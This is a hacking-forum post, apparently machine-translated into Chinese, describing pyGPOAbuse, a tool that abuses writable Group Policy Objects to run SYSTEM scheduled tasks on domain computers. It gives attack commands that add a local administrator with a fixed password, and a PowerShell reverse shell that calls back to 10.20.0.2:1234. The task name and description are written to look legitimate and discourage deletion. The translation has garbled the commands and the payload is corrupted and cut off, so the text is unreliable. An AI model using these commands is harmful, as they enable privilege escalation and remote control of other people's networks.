taibeihacker
Moderator
pythonpartial@pkb1s实施Sharpgpoabuse
当受控帐户可以修改适用于一台或多台用户计算机的现有GPO时,可以使用此工具。它将在远程计算机上创建immediate scheduled taskASSYSTEM,以用于计算机GPO,或在用户GPO中登录的用户。
默认行为添加了本地管理员。
How to use
Basic usage
向本地管理员组添加john用户(密码:H4x00r123..)./pygpoabuse.py域/用户-Hashes LM:NT -GPO-ID'12345677-ABCD-9876-ABCD-9876-ABCD-123456789012'010-
./pygpoabuse.py域/用户-Hashes LM:NT -GPO-ID'12345677-ABCD-9876-ABCD-123456789012'\
-Powershell \
-command'\ $ client=new-object system.net.sockets.tcpclient('10 .20.0.2',1234); \ $ stream=\ $ client.getStream(); [byte [byte] \ $ bytes=0.655535 |%{0}; \ $ bytes.length))-ne 0){; \ $ data=(new -object -typename system.text.asciiencoding).getString(\ $ bytes,0,0,\ $ i); \ $ sendback=(iex \ $ $ $ $数据21 | out -string) '; \ $ sendbyte=([text.encoding] :ascii).getBytes(\ $ sendback2); \ $ stream.write(\ $ sendbyte,0,\ $ sendbyte.length
-taskName'完全合法任务'\
- 描述'dis是合法的,pliz no delete'\
- 用户